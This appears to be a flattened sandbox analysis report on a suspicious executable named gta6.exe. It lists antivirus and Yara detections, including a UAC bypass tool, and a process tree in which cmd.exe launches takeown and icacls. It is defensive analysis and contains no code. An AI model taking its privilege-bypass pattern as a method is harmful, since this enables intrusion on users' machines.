behaviorgraph top1 signatures2 2 Behavior Graph ID: 1544786 Sample: gta6.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 72 19 Antivirus / Scanner detection for submitted sample 2->19 21 Multi AV Scanner detection for submitted file 2->21 23 Yara detected UACMe UAC Bypass tool 2->23 25 2 other signatures 2->25 7 gta6.exe 8 2->7         started        process3 process4 9 cmd.exe 1 7->9         started        process5 11 icacls.exe 1 9->11         started        13 takeown.exe 1 9->13         started        15 conhost.exe 9->15         started        17 20 other processes 9->17
No contacted IP infos